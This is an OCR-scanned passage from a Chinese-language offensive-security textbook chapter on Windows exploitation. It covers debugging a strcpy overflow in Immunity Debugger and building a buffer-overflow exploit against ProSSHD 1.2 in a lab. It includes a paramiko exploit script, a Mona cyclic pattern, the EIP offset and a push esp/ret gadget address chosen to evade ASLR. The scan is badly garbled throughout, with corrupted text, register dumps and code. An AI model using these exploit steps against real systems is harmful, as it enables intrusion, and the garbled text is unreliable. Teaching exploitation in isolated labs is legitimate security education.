strcpyO 时 设置 一 个 断 点 。 按 向 下 方向 键 直至 到 达 地 址 为 0x00191034 的 那 行 。 与 前 面 
所 说 的 一 样 ，Windows 厂 本 上 的 地 址 和 符号 可 能 与 此 不 同 。 如 果 是 这 样 的 话 ， 只 需 
要 找到 Disassembler 窗 口 右 侧 显 示 ASCII "Hello %s %s" 的 地 方 ， 在 其 上 几 行 中 找到 
CALL 指 令 ， 用 以 了 解 在 何 处 设置 了 断 点 。 可 单 击 指令 ， 按 Enter 键 来 验证 这 是 售 是 
正确 的 调用 。 这 将 显示 正在 对 strcpy0O 函 数 进行 调用 。 在 这 一 行 中 ， 按 下 F2 键 来 设置 
一 个 断 点 ， 此 时 该 地 址 应 变 成 红色 。 断 点 可 用 于 快速 返回 到 该 位 置 。 例 如 ， 在 这 一 
位 置 ， 可 以 按 Ctrl+F2 组 合 键 重 局 程序 ， 然 后 按 F9 键 继续 执行 到 这 个 断 点 。 现 在 应 能 
看 到 Immunity Debugger CAE PR itis] FA A BEES. 


注意 : 由 于 基 址 重 定位 和 ALSR 技 术 ,， 本章 中 给 出 的 这 些 地 址 值 很 可 能 与 测 
试 系统 上 的 地 址 值 不 同 。 因 此 ,请 关注 技术 本 身 而 不 是 特定 的 地 址 。 另 外 ， 
取决 于 测试 用 的 操作 系统 版 本 ， 每 次 启动 程序 时 可 能 需要 手动 设置 断 点 ， 
在 一 些 Windows 版 本 中 , Immunity Debugger 似 乎 存在 不 能 保存 断 点 的 问题 。 
WinDbg 是 一 个 不 错 的 替代 品 ， 但 不 直观 . 


由 于 已 在 漏洞 图 数 调 用 处 设置 了 一 个 断 点 ， 因 此 可 以 继续 单 步调 试 并 跳 过 
strcpy0 函 数 ( 按 F8 键 )。 当 寄存 器 发 生变 化 时 ， 就 会 看 到 它们 变 成 红色 。 这 是 因为 ， 
刚刚 执行 了 strcpyO 函 数 调用 ， 所 以 应 能 看 到 许多 寄存 器 变 成 红色 。 继 续 单 步调 试 程 
序 直 到 RETN 指 令 , 对 应 于 greeting0 函 数 的 最 后 一 行 代 码 。 例如, 由 于 保存 的 EIP“ 返 
回 指 针 ” 己 经 被 4 个 A 窗 新 , 因此 调试 右 指 出 该 函数 即将 返回 到 0x41414141。 如 图 13-5 
所 示 ， 还 请 留意 函数 尾部 如 何 将 EBP(Extended Base Pointer) 复 制 到 ESP(Extended 
Stack Pointer) 中 ， 然 后 将 从 堆栈 中 弹出 的 值 (0x41414141) 和 存放 到 EBP 中 。 


AABLA ||. BB45 88 HOU EAR, DWORD PTR $5: [EBP+8] EDX 936003 

HB8811H46|| . 5H Pus «xs ESP IBETAFYSW ASCII "AAAA" 

v0811047||. 68 ggpgs3og | PUSH neet.0683B080 Format = "Hello xs xsE"  |FBP 41414141 

BB81184C||. ES 22616888 CALL meet.printf -printf ESI BBamadpgada 

99811051||. 83c4 ØC ADD ESP,@c EDI panana 

@8811954|| . SBES MOU ESP, EBP 

aasiiase|| . 5D POP EBP FIP 68811057 meet . 0A811057? 

GELES 05? =. C3 C H ES @@23 32bit HCFFFFFFFF) 

Au CC LE Pi CS BBiB 32bit BCFFFFFFFF) 
eps | E NT: .]ü 1 88 0823 32bit UCFFPFPFFP) 

HB81185R INTI Zu 23 32bit @<FFFFFFF 

Return to TTT ER: FS DAAB 32bit 7FFDFB8BCABBE 

Address |Hex dump [ASCII » EEE 41414141 — 

WdS3BUUG|4U 65 GC GC GF ZU Z5 73 Helle xs ne F 

9683B008|20 25 73 Bf G0 AA ab aal 0014F79C| GO265A1F PZA. ASCII "i 

B883B018|42 79 65 20/25 73 28 25| Bye zs 7 |DBI3P7nB | POGLAFIES 25T. | 

60835018 7j AA qoc pL TS a api 4F784 || 04811436 |6%i. | RETURN 1 

00838020180 D4 83 69/08 BƏ Gà gB|. tà. ...- 9B14F7R8 DOSEDEDS Mos" 

t Hracmimuab Bt E MEN | 8814F7RC || a82659F8 | YA. 
9983B939|99 60 NM GG UG 99 DO gg | Nes |ü814F7B8 | 94267598 | E~% 
80883B838|BB i8 a8 99| oa an AA BO|....... | OH AF 7 BA || GCFFBRO2 S 1 
8083B040/88 AO GB HA/AA BO OB GU| eae | G81 4P°7 BS || G0000008 | . . . - 
96838048 (66 BG GB GB 9g2 GO GB BU|....G... Ben aE EAE 1s 
9083B050|81 AA AA 84/88 AA BA BB\O......- beet d ries aad ee 
8883B858|B8 AA GA BM 00 AA OB GO|........ | eee ach rps 
—— Ine -lamrarocc|| amanamaa| ^ *~ 


图 13-5 Immunity Debugger Pitty BZD ait 


HMHE, SABI AFER, FPP mes AH; BS A, TE 
EIP(Extended Instruction Pointer) Ziff 4S 534750x41414141.. 3X ER 7J H Fe n (First 
Chance Exception)， 因 为 在 程序 骨 尝 前 ， 调 试 器 和 程序 还 有 机 会 处 理 异 常 。 可 按 
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ShifttF9 键 将 异常 传 给 程序 。 这 里 ， 由 于 程序 自身 没有 提供 任何 异常 处 理 程序 ， 因 
此 操作 系统 蜡 常 处 理 程序 就 会 捕获 异常 并 终止 程序 。 可 能 需要 多 次 按 ShiftF9 键 
能 看 到 程序 终止。 

程序 崩溃 后 ， 还 可 继续 检查 其 内 存 区 域 。 例 如 ， 可 在 栈 窗口 中 单 击 ， 并 向 上 演 
动 ， 以 便 查看 前 一 个 栈 帧 (也 就 是 刚 从 那里 返回 的 栈 帧 ， 现 在 变 成 灰色 了 )。 可 以 看 
到 (在 测试 的 系统 中 ) 缓 冲 区 的 开头 ， 如 图 13-6 所 示 。 


BA14FSF4| AASIRANA |. $4. ASCII "Hello zs xsi" 
WM 4F5FB8, B265nB0B|.Z& 


O61 4F5FC 64014F666 |. 


O814F6@4 


014F614 
WH14F618 


gni 4F63H 
4414F634 
HH14F638 


41414141 


41414141 |f 


41414141 
41414141 


41414141 | | 


41414141 
41414141 
41414141 
41414141 
41414141 
41414141 
41414141 


41414141 |f 


41414141 


图 13-6 ”在 Immunity Debugger 中 查看 栈 帧 信息 (一 ) 


为 继续 查看 已 朋 误 计算 机 的 状态 ， 可 在 栈 窗 口中 ， 癌 下 滚动 到 当前 栈 帧 (当前 栈 
帧 将 高 亮 显 示 )。 还 可 通过 以 下 方式 返回 到 当前 栈 帧 : 选中 ESP 寄 存 器 值 ， 然 后 右 击 
ESP 并 选择 Follow in Stack。 要 注意 ， 在 位 置 ESP+4 处 还 有 一 份 绥 神 区 的 副本 ， 如 
RIGIDIS Tet OE A 此 类 信息 将 非常 有 用 。 


FAX 68895513 
ECA WUHB112HB meet .6481126B 
EDR 6426818B 

EBA HHBBHHHHH 

ESP 


EBP 41414141 
ESI WHHHBHBHH 
EDI OHHHHÖHH 


EIP 41414141 


C B ES 8823 32bit BCFFFFFFFF> 
Pi CS 661B 32bit HCFFFFFFFF> 
A 1 $8 6623 32hit HCFFFFFFFF)> 
4246 DS 88H23 32bit B«CFFFFFFFF» 


QH14F78C; 41414141 | AAAA ^ 
Q@614F796| 41414141 | AAAA 
6H14F 794 31414141 AAAA 


Wn 4b 778 
ani 4F79C B826501P TZR. ASCII AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAÑI 
6614F7AG | røBi4F FES | 9-77. 


图 13-7 #EImmunity Debugger 中 查看 栈 帧 信息 (二 ) 
通过 前 面 的 介绍 可 以 看 出 ，Immunity Debugger 简 单 易 用 。 
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X ” 注意 在 撰写 本 书 时 ， Immunity — “能 用 于 在 用 户 空 间 中 调试 32 位 
\_ 写 ”应 用 程序 。 如 果 需 要 深入 内 核 空间 ， 那 么 必须 使 用 WinDbg 这 样 的 Ring0 级 
调试 器 


在 本 实验 中 , 我们 输入 恶意 数据 并 使 用 Immunity Debugger 来 跟踪 此 时 程序 的 执 
行情 况 : 识别 to ea 3 用 并 设置 断 点 以 进行 单 步调 试 ， 继 续 运 行程 序 并 确认 可 
Mes HESE Kell WstrepyOm aia ATEN IAA JOVE TS nu M greetingO AZUR 
回 人 到 main0 函 数 的 返回 指针 。 


13.2 ”编写 Windows 漏 洞 攻击 程序 


在 本 章 剩 下 的 部 分 ， 将 主要 讨论 如 何 使 用 Kali Linux 上 默认 安 痛 的 Python。 用 来 
运行 示例 中 的 漏洞 程序 的 目标 操作 系统 是 Windows 10 x64 Enterprise. 

AX Hh Sk 5: fi H Immunity Debugger 及 其 Mona 插 件 (来 目 Corelan 团 队 ， 
https:/www.corelan.be)， 目 标 是 继续 巩固 前 面 学 到 的 漏洞 攻击 程序 的 开 肥 过程 。 随 
后 ， 还 将 学 习 如 何 从 一 个 漏洞 公告 开始 ， 开 发 基本 的 概念 验证 (PoC) 漏 洞 攻击 程序 。 


13.2.1 回顾 漏洞 攻击 程序 的 开发 过 程 


回顾 第 12 草 的 内 容 ， 漏 洞 攻击 程序 的 开 肥 过程 如 下 所 示 : 
(1) 控制 EIP 

(2) TAKE (ite Be 

(3) HAE BG HE 

(4) 生成 shellcode， 也 就 是 构建 漏洞 攻击 

(5) 验证 漏洞 攻击 

(6) 如 有 必要 ， 调 试 漏 洞 攻击 程序 


13.2.2 ”实验 13-3: 攻击 ProSSHD 服 务 器 


ProSSHD 服 务 器 提供 网 络 SSH 服 务 ， 可 让 用 户 “ 安 全 地 ”进行 连接 并 通过 一 个 
经 过 加 密 的 通道 提供 shell 访 问 。 该 服务 器 在 端口 22 上 运行 。 几 年 前 曾 有 安全 公告 警 
告 说 ， 针 对 号 份 认证 后 行为 (Post-authentication Actiom) 存 在 缓冲 区 溢出 漏洞 。 这 和 意味 
者 ， 用 户 必须 在 服务 左上 拥有 一 个 账户 才能 利用 该 漏洞 。 可 通过 癌 SCP GET 命 令 的 
路 径 字 符 串 ， 传 入 超过 500 字 市 的 数据 来 攻击 该 漏洞 ， 如 图 13-8 所 示 。 


256 


#138 基本 的 Windows 漏洞 攻击 


me — Connect | - 
| Atechnical community for Symantec customers, end-users, S and partners. 


| info Ti discussion | exploit | solution E references | 
ProSSHD 'scp get()' Buffer Overflow Vulnerability 
ProSSHD is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user- supplied data. 


An attacker can exploit this issue to execute arbitrary code within the context of the application. Failed exploit attempts will 
result in a denial of service. 


ProSSHD v1.2 20090726 is vulnerable; other versions may also be affected. 


图 13-8 ProSSHDARA 4s E]: V D Ji Ha di 1h] 


文 里 ， 将 在 运行 Windows 10 x64 Enterprise 的 VMware 客户 虚拟 机 中 搭建 存在 漏 
洞 的 ProSSHD v1.2 服 务 需 。 当 然 ， 也 可 以 使 用 Windows 7 或 Windows 8。 请 注意 ， 运 
行 在 Immunity Debugger 上 的 每 个 Windows 版 本 都 可 能 产生 稍 有 不 同 的 结果 ; 但 本 章 
中 使 用 的 最 终 漏 调 攻击 程序 已 在 多 个 Windows 厂 本 上 测试 过 。 之 所 以 使 用 VMware， 
是 因为 VMware 使 得 在 测试 过 程 中 可 以 快速 地 局 动 、 俘 止 和 重 司 虚拟 机 ， 这 要 比 真 
正 地 重 局 系统 快 得 多 。 


警告 : 由 于 正在 运行 的 是 一 个 存在 漏洞 的 程序 ， 因 此 最 安全 的 测试 方式 是 
将 VMware 的 虚拟 网 卡 (Virtual Network Interface Card，VNIC) 设 置 为 
host-only networking 模 式 . 这 将 确保 不 会 有 外 部 计算 机 能 连接 到 这 个 存在 漏 
洞 的 虚拟 机 。 更 多 信息 请 参见 VMware 文档 (www.vmware.com)。 


在 虚拟 机 中 下 载 并 安装 ProSSHD 应 用 程序 (www.labtam-inc.com/articles/ 
prosshd-1-2.html)。 为 激活 服务 器 ， 还 需要 注册 以 获取 30 天 的 免费 试用 权 。 使 用 — 典 
型 选项 成 功 安 装 后 ， 从 安装 目 ri 例如 ， 安 装 目 录 是 C:\Users\ 
Public\ProgramFiles (x86)\Lab-NC\ProSSHD\xwpsetts.exe. 启动 后 (如 图 13-9 所 示 )， 
单 击 Run 菜 单 ， 然 后 单 击 Run as exe 按 钮 。 如 果 此 时 防火 墙 弹 出 ， 还 需要 单 击 Allow 
Connection (人 允许 访问 网 络 连 接 )。 


Settings (30 days evaluation license...) XWP.ini 
File Help About Close 


Run 


ComSetup XwpSSHD service 


XwpSSHD service Service name: XWP SSH server 


Properties: Windows Firewall: 


wwe [=| Cost) | us 
图 13-9 ”局 动 ProSSHD 服 务 器 
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ex 注意 :如果 目 标 虚 拟 机 上 运行 了 针对 所 有 程序 和 服务 的 数据 执行 保护 (DEP)， 

\_ 写 ”那么 需要 暂时 将 ProSSHD 设 置 为 例外 。 我 们 将 在 后 面 的 例子 中 重新 开启 
DEP， 用 以 展示 在 开启 DEP 的 情况 下 ， 使 用 返回 导向 编程 (Return-Oriented 
Prosramming，ROP) 修 改 权 限 的 过 程 。 最 快捷 的 检查 方式 是 在 键盘 上 按 住 
Windows 键 的 同时 按 Break 键 以 跳 转 至 系统 控制 面板 。 单 去 位 于 左 侧 的 
Advanced System Settings， 在 弹出 窗口 的 Performance 选 项 区 单 击 Settings， 
再 选择 右 侧 窗 格 中 的 Data Execution Prevention 标 签 。 若 已 选中 Turn on DEP 
for all programs and services except those I select， 则 需要 将 wsshd.exe 和 
XWpsshd.exe 这 两 个 可 执行 程序 设 为 例外 : 单 击 Add， 从 ProSSHD 文 件 夹 中 
选中 这 两 个 可 执行 程序 , 即 可 完成 ! 我 们 将 在 下 一 章 中 构建 漏洞 攻击 程序 ， 
通过 ROP 森 用 DEP. 


既然 SSH 服 务 占 已 在 运行 ， Bs 要 确定 系统 的 IP 地 址 ， 然 后 使 用 SSH 客 户 端 从 
Kali Linux 计 算 机 进行 连接 。 这 里 ， 运 行 ProSSHD 的 漏洞 虚拟 机 的 全 地 址 为 
192.168.10.104。 可 能 需要 通过 管理 员 命 令 行 使 用 NetSh Advfirewall set allprofiles state 

任命 令 关 闭 Windows 防 火 墙 ， 或 简单 地 添加 规则 ， 人 允许 SSH 通 过 TCP 端 口 22 入 站 。 

此 时 ， 漏 洞 应 用 程序 和 调试 右 均 已 在 漏洞 服务 器 上 运行 ， 只 是 尚未 关联 ， 建 议 
通过 创建 快照 的 方式 将 虚拟 机 的 当前 状态 保存 起 来 。 快 照 完成 后 ， 只 需要 恢复 到 该 
快照 就 可 以 返回 到 这 个 状态 。 这 个 技巧 将 有 助 于 节省 宝 贯 的 测试 时 间 ， 在 后 续 测 试 
迭代 中 可 跳 过 所 有 前 面 的 设置 和 重 局 步 又 。 


1. 控制 EIP 


在 Kali Linux 虚 拟 机 中 打开 编辑 融 ， 并 创建 一 个 新 的 脚本 prosshdl.py， 用 以 验证 
ARH tie HURST o 


#prosshdl .py 


# Based on original Exploit by S2 Crew [Hungary] 
import paramiko 

from scpclient import * 

from contextlib import closing 

from time import sleep 

import struct 


hostname = "192.168.10.104" 
username = "test1" 
password - "asdf" 


req = "A" * 500 


ssh client - paramiko.SSHClient () 
ssh client.load system host keys () 
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ssh client.connect(hostname, username-username, key filename-None, 

password-password) 

sleep(15) 

with closing(Read(ssh client.get transport(), req)) as scp: 
scp.recelve ("foo.txt") 


C K 注意 : 该 脚本 依赖 于 paramiko 和 scpclient 模 块 ， 应 该 已 经 安装 了 paramiko 模 
NS A, 但 需要 确认 Kali 版 本 包含 scpclient 模 块 。 如 果 运行 以 下 脚本 ， 并 得 到 关于 
scpclient 的 鲁 误 ， 则 需要 从 https:/pypi.python.oreg/packages/source/S/sScpclient/ 
scpclient-0.4.tar.gz 下 载 scpclient 模 块 的 setup.py 并 运行 。 还 需要 从 Kali Linux 
命令 行 运行 默认 的 SSH 客 户 端 来 连接 一 次 漏洞 服务 器 ,使 该 SSH 客 户 端 在 
已 知 的 SSH 主 机 列表 中 。 同 时 ， 需 要 在 运行 ProOSSHD 的 目标 虚拟 机 上 创建 
一 个 账 己 以 供 漏洞 攻击 程 厅 使 用 ， 这 里 使 用 test1 作 为 用 尸 名 ， 并 设置 黎 码 

为 asdf。 创 建 该 账户 或 类 似 账户 ， 供 本 实验 使 用 。 


这 个 脚本 将 在 及 起 攻击 的 主机 上 运行 ， 而 攻击 目标 则 运行 在 VMware 虚拟 机 中 。 


cx 注意 : 修改 中 地 址 以 匹配 测试 用 的 漏洞 服务 器 ， 并 确认 已 在 Windows VM 
Vox AETA P KE testi. 


实际 上 ， 本 例 中 的 漏洞 存在 于 子 进程 (wsshd.exe) 中 ， 当 只 有 一 个 到 服务 器 的 活 
跃 连接 时 该 进程 才 会 存在 。 因 此 ， 需 要 在 局 动 漏洞 攻击 程序 后 迅速 地 关联 调试 右 以 
继续 进行 分 析 。 这 就 是 为 什么 调用 sleep0 函 数 时 要 以 15 秒 作为 参数 的 原因 ， 它 给 了 
gdb 关 联 的 时 间 。 在 VMware 虚 拟 机 上 ， 可 通过 选择 File | Attach 将 调试 嚣 关联 到 漏洞 
程序 ， 选 择 wsshd.exe 进 程 ， 然 后 单 击 Attach 按 钮 来 关联 调试 器 。 


m xX 注意 : 按照 Name 列 对 Attach 屏 幕 进 行 排序 ， 有 助 于 快速 找 出 wsshd.exe 进 
KS 程 。 如果 需 要 更 多 关联 时 间 ， AA EE Att Asleep) AAt E 29 BRYN 
秒 数 。 


Debugsger 关 联 到 wsshd.exe， 如 图 13-10 所 示 。 


python prosshdl.py 


259 


260 


SRM RB de Geb DX ou 


vsshd 
xupsettz 


Untitled 一 Motepad 


= \Python2'7 
xwpsshd.exe —RunfsExe C:\Users\Pu 
DWM Notification Window C:\Windows’ 
MCI command handling window C:\Windows’ 
Star C:\Windows 
Default IME C:\Program 
DnDControlTitle C:\Program 
C:\Windows’ 
HiddenT PAutoConnectWindow |C:\Program 
C:\Windows’ 
| Cz NPython2? 7 


Cancel | 


Python Shell 


图 13-10 “启动 攻击 脚本 及 调试 器 


一 旦 调试 堪 司 动 并 加 载 进 程 后 ， 按 F9 键 让 调试 需 “ 继 续 ” 执 行 。 

此 时 ， 漏 洞 攻 击 应 该 已 经 得 以 实施 ， 并 且 调 试 器 的 右 下 角 应 该 变 成 黄色 并 提示 
Paused， 如 图 13-11 所 示 。 依 赖 于 目标 主机 上 所 安装 的 Windows 版 本 ， 第 一 次 暂停 后 
调试 右 可 能 会 要 求 再 次 按 F9 键 。 因 此 ， 乔 在 EIP 寄 存 需 中 看 到 的 并 非 0x41414141， 
请 再 次 按 F9 键 。 通 弟 较 好 的 做 法 是 ， 将 调试 右 窗 口 放 在 一 个 能 看 到 其 右 下 角 状 态 的 
位 置 ， 这 样 当 调试 右 和 暂停 时 就 可 以 及 时 观察 到 。 


EBA UBBBHi16C 

ESP HB12EF88 ASCII “AAAAAAAZLoo.txt" 
EBP 6612F3A4 

ESI Y6A635B? kernel3j2.CreatePipe 

EDI 8B12F3RHB 


EIP 41414141 
[16:22:22] Access violation when executing [41414141 ] 


[13-11 提示 Paused 
可 以 看 出 ， 我 们 已 获得 EIP 的 控制 权 ，EIP 的 值 现在 是 0x41414141。 
2. ERs = 


接 下 来 需要 利用 Corelan 团 队 的 PyCommand 岳 件 mona.py 来 生成 用 以 确定 可 控 字 
节 数 的 模式 。 要 获取 mona.py， 可 从 https://github.com/corelan/mona 下 载 该 工具 的 最 新 
副本 ， 并 保存 到 Immunity Debuggerll']PyCommands S/F F. 我 们 将 使 用 从 Metasploit 
移植 而 来 的 模板 脚本 。 首 先 需要 设置 Mona 可 写 入 的 输出 工作 目录 。 完 成 此 操作 后 ， 
启动 一 个 Immunity Debugsger 实 例 ， 此 时 不 必 考 虑 加 载 程序 的 问题 。 随 后 在 调试 右 窗 
口 的 底部 单 击 Python 命 令 行 ， 并 输入 下 列 命令 : 


Imona config -set workingfolder c:\grayhat\mona logs\%p 


filmmunity Debugger 跳 转 到 日 志 窗 口 ， 可 在 功能 区 单 击 “c” 按 钮 跳 回 CPU 主 
界面 。 现 在 震 要 生成 将 在 脚本 中 使 用 的 一 个 500 字 市 的 模板， 可 在 Immunity 
Debugsger 的 Python 命令 行 中 键入 : 


Imona pc 500 
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这 将 生成 一 个 500 字 节 的 模板 ， 并 存储 在 一 个 新 建文 件 夹 (位 于 你 所 指定 的 Mona 
输出 目录 ) 下 的 文件 中 。 请 检查 Ci\grayhatmona logs\ 目 录 中 可 能 名 为 “no name" 
之 类 的 新 建文 件 来。 该 目录 中 应 含有 一 个 名 为 pattern.txt 的 新 文件 ，pattern.txt 文 件 是 
想 妥 复制 的 生成 模板 所 在 的 文件 .Mona 会 提醒 不 要 从 Immunity Debugger 的 日 志 窗 口 
复制 模板 ， 因 为 模板 可 能 会 被 截断 。 

在 Kali Linux 虚 拟 机 上 保存 prosshdl.py 攻 击 脚本 的 一 份 新 副本 ， 并 重 命名 为 
prosshd2.py。 从 pattern.txt 文 件 中 复制 模板 ， 并 更 改 req 行 以 包含 该 模板 ， 如 下 所 示 : 


# prosshd2 .py 

„truncated... 

req = 

"Aa0AalAaZ2Aa3Aa4Aa5Aaó6Aa /Aa8Aa9AbOAb1ADbZAb3ADbAADDADbOAbD /AbS8Ab9AcOAC 
lACZ2ACGACAACDACOAC/AC8AC9Ad0AdlAd2Ad3Ad4Ad5Ad6Ad/Ad8Ad9Ae0Ae1Ae2Ae 
3Ae4AAe5Aec6AeG7AGOBAGOATfOÜATflATf2ATf3AfAAfDAfOAT/AfÍSGAfÍ9AgÜ0Ag1Aq2Aq3Ag4Aq 
5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9A10A11A12A13A14A15A106A1 
7A18A19A3j0A3j1A32A33A34A35A36A3]7A3j8Aj9AkOAKl1Ak2Ak3AkAAk5AkO6AK"7Ak8Ak 
9ALOALT1AI2AI3AI4A15AL6A17A18A]1 9AmOAm] Am2Am3Am4 Am5 Am6Am / Am8 Am9AnO0 An 
lAn2An3An4An5Anó6An/An8An9AO0AO1AO2AO3AOA4AO5AO6AO/AOODAOO9ApOAplAp2Ap 
3ApAAp5Ap6oAp/ApO8Ap9Aq0AqlAq2Aq3Aq4Aq5Aq" 

„truncated... 


: 在 复制 模板 时 ， 这 本 是 很 长 的 一 行 ， 本 例 中 使 用 了 自动 换行 格式 、。 


从 Kali Linux?’ vin ff [118 H] python prosshd2.py 运 行 这 个 新 脚本 ， 如 图 13-12 所 示 。 


À Immunity Debugger - wsshd.exe - [CPU - main thread] m 
[1 File View aliam. mm ImmLib Options Window Help Jobs |- | =| x| 
jS «x I Willis lemtwhcPkblzr..s? 


»|Registers <FPU) < 
565595979C 
7FFDEBBB 
990090906 
BBBBB179 
WBB12EF88 ASCII “q4hqSAg/foo.txt" 
BP @012F3A4 
j|] 76H635B7 kernel32.CreatePipe 
9012F3AG 
41337141 
0012EF88 MESETELVZBETUI, 
BH1ZEF8C| 2F'714135 | 5fiq^ 
QB12EF98| 2EGFGF66 |foo. 
= de Elon RS EE : @G12EF94| 88747874 |txt. 
Aa44C018 AA AA AO AAAA AA AA AA ht BB12EF98| Bi1CI5BBB|.P^G ， 


Show Breakpoints window (Alt+B> | | Paused 


图 13-12 ”运行 新 脚本 


与 预期 的 一 致 ， 这 次 调试 器 捕获 了 异常 ， 而 EIP 的 值 包含 了 模式 的 部 分 值 
(41337141)。 同 时 ， 可 注意 到 栈 指 针 ESP 也 指 癌 模 式 的 一 部 分 。 
fit FHMonafl']pattern offset 命 令 来 计算 EIP 的 仿 移 量 ， 如 图 13-13 上 所 示 。 
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aGBaDFBBD|E*1 Command used: 
BBRDEBBD|*mona po fiq3n 

ABRDFBBD|Looking for ha3h in pattern of S5BBBBB bytes 

BBAÜDFBHD| — Pattern ha3h found in cyclic pattern at position 489 
BBRDFDBBD|Looking for Aqg3A in pattern of 5HB8BBH bytes 

BBADFBHD| — Pattern fi3gf not found in cyclic pattern uppercase? 
OBADFOOD | Looking for fiq3R8 in pattern of “500000 bytes 

PERE ier 一 Pattern ASGA not found in cyclic pattern <lovercase?) 


9BADFGGD [+] This mona.py action took 日 : BB: BB. 217606 


Imona po Aq3A 
图 13-13 ”确定 偏 移 量 


可 以 看 出 , 在 缓冲 区 的 489 字 市 后 , 测试 中 使 用 41337141 将 EIP 莉 产 ( 从 490 到 493 
字 节 )。 这 在 得 看 Immunity Debugger 的 Stack 区 域 时 可 以 看 到 。 在 4 个 字 节 之 后 (493 字 
节 后 )， 可 发 现 缓冲 区 的 剩余 部 分 在 程序 朋 尝 后 位 于 栈 顶 。 刚 才 在 Mona 中 使 用 的 
Metasploit pattern offset 工 具 给 出 了 从 模板 开始 处 的 偏 移 量 。 


3. 确定 攻击 向 量 


在 Windows 系 统 中 ,堆栈 位 于 内 存 低 地 址 中 。 这 就 是 在 Linux 汤 洞 攻击 中 曾 使 用 
的 Aleph 1 攻击 技术 所 提出 的 一 个 难题 。 与 meet.exe 程 序 有 些 陈旧 的 演示 场景 不 同 的 
是 ， 对 于 实际 的 漏 铜 攻击 ,不 能 人 简单 地 用 堆栈 上 的 返回 地 址 来 履 闸 EIP。 这 个 地 址 的 
开头 很 可 能 包含 0x00， 而 在 将 空 字 节 传 名 SIUE 2 mE 

对 于 Windows 系 统 ， 必 须 找 到 另 一 种 攻击 行为 。 通 第 会 肥 现 ， 当 Windows 程 序 
Bii]. RIX E ete oriki RRA piii 
样 ， 控 制 着 程序 在 堆栈 的 哪个 区 域 裔 省。 所 要 做 的 只 是 将 shellcode 放 置 在 从 493 字 
开始 的 地 方 ， 然 后 在 这 个 仿 移 之 后 用 操作 人 码 “jmp” 或 “call esp” 的 地 址 来 黎 兽 EIP。 
选择 此 类 攻击 行为 的 原因 是 ， 这 些 操作 人 码 均 将 ESP 的 值 放 到 EIP 中 并 加 以 执行 。 男 一 
个 选项 和 是否 找 在 ret 之 后 执行 push esp 的 指令 序列 。 

为 找 出 目标 操作 码 的 地 址 ， 需 要 在 ProSSHD 程 序 或 动态 链接 到 它 的 模块 (DLIL) 
中 搜索 该 操作 码 。 记 住 ， 在 Immunity Debugger 中 ， 可 按 AlttF 键 列 出 所 链接 的 模块 。 
这 里 将 使 用 Mona 工 具 在 加 载 的 模块 中 进行 搜索 : 首先 通过 Mona 确 定 哪些 模块 不 参 
与 诸如 /REBASE 和 地 址 空间 布局 随机 化 (ASLR) 之 类 的 漏洞 攻击 反 制 控制 , 而 与 第 三 
方 应 用 绑 定 的 模块 不 参与 未 些 或 全 部 反 制 控制 的 情况 很 钊 见 。 为 找 出 那些 可 衫 漏 
洞 攻击 程序 使 用 的 模块 ， 可 运行 Inmunity Debugsger 的 !Imona modules 人 命令。 也 可 使 
用 !mona modules -o 排 除 OS 模 块 。 之 前 Immunity Debugsger 已 经 天 联 的 wsshd.exe 进 
程 应 该 依然 存在 ， 并 且 EIP 中 会 显示 上 述 模 株 。 如 果 不 是 这 样 ， 继 续 运 行 之 前 的 步 
又 ， 直 全 调试 左 成 功 天 联 该 进程 后 ， 运 行 如 下 命令 ， 可 得 到 相同 的 结果 ， 如 图 13-14 
所 示 。 


!Imona modules 
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«à Immunity Debugger - wsshd.exe - [Log data] (= E OUS 
En m i gum — or Window Help Jobs E | x 
Massage 
Module info 
Base Top Size Rebase Saf eSEH ASLE NaCompat OS Dll Version, Modulename & Pat 
Ox7c346600 | Hx7c37680B8H | HxBBd568B8H i False i True | False i False | False i 7.16. 3852. 4 [HSUCR'71. 211 
Ox754466808 | @x7548c O88 | HxBHDBH4cHBaH | True | True | True True | True i B 1.7608.16385 arr iH 
HxHHdididbHHH i HxHBH376HHH | xm A i True i True i False i False i False i -1.H- eae up.D 
Hx75H8HBHHH | Hx75HB65HHH | HxHHHH5HBH i True i Irue i [rue i True i Irue i b. 1.76000. 16385 [ushive. Nt 
ax761580088 | Bx7622480808 | 8xüaüaddd4aBBH | True i True | True : True 1 True 6.1.76808.16385 [kerne132. 
Hx771cHHHH i Hx7725cHHH | HxHHHacHHH i True i True i True [| True i True 7.8.768H.16385 [msucrt.dl- 


Imona modules 


Paused 


图 13-14 ”搜索 操作 码 


从 Mona 的 输出 样本 中 可 看 出 ，MSVCR71.dll 模 块 并 不 受 大 多 数 可 用 的 漏洞 攻击 
反 制 控 " tet. Bou. MSVCRT71.dll EH itfrAkubukN. ABH 
ASLR。 这 意味 着 奋 在 其 中 找到 目标 操作 码 ， 其 地 址 将 是 稳定 可 靠 的 ， 这 可 以 被 用 
作 源 泣 攻击 程序 ， 从 而 弦 过 ASLR 朱 术 ! 

现在 继续 使 用 来 日 Peter Van Eeckhoutte( 义 名 corelanc0d3r) 和 Corelan 团 队 的 Mona 
插件 。 这 里 将 用 Mona 插 件 从 MSVCR71.dll 中 找 出 目标 操作 码 。 运 行 以 下 命令 


Imona jmp -r esp -m msvcr/1.dll 


imp 2 SUE RRRS RI, SITE Ta Ae R SUIT SIF 
标 地 址 的 寄存 左 ， 而 可 选 参数 -m 则 指定 了 竺 搜索 的 模块 ， 这 里 选择 的 就 是 前 面 提 及 
的 MSVCR71.dll。 执行 上 述 命令 后 , 会 在 Ci\grayhatmona logs\wsshd 下 新 建 一 个 文件 
夹 ， 其 下 有 一 个 名 为 jmp.txt 的 文件 ， 其 内 容 如 下 : 
0x7c345c30 : push esp # ret | asciiprint,ascii {PAGE EXECUTE READ] 
[MSVCR71.d11] 
ASLR: False, Rebase: False, SafeSEH: True, OS: False 
(C:\Users\Public\Program Files\Lab-NC\ProSSHD\MSVCR71.d11) 
地 址 0x7c345c30 处 是 指令 push esp # ret， 这 实际 上 是 两 个 单独 的 指令 。push esp 
指令 将 ESP 中 的 栈 地 址 压 入 栈 ， 而 ret 指 令 使 得 该 地 址 被 写 入 EIP， 并 执行 那里 可 能 存 
在 的 指令 。 这 正 是 为 什么 会 产生 DEP 技 术 的 缘由 。 


Vox 将 不 得 不 反复 查看 寄存 器 并 处 理 所 得 数据 。 例 如， 可 能 需要 使 用 jmp eax 或 


jmp esi. 


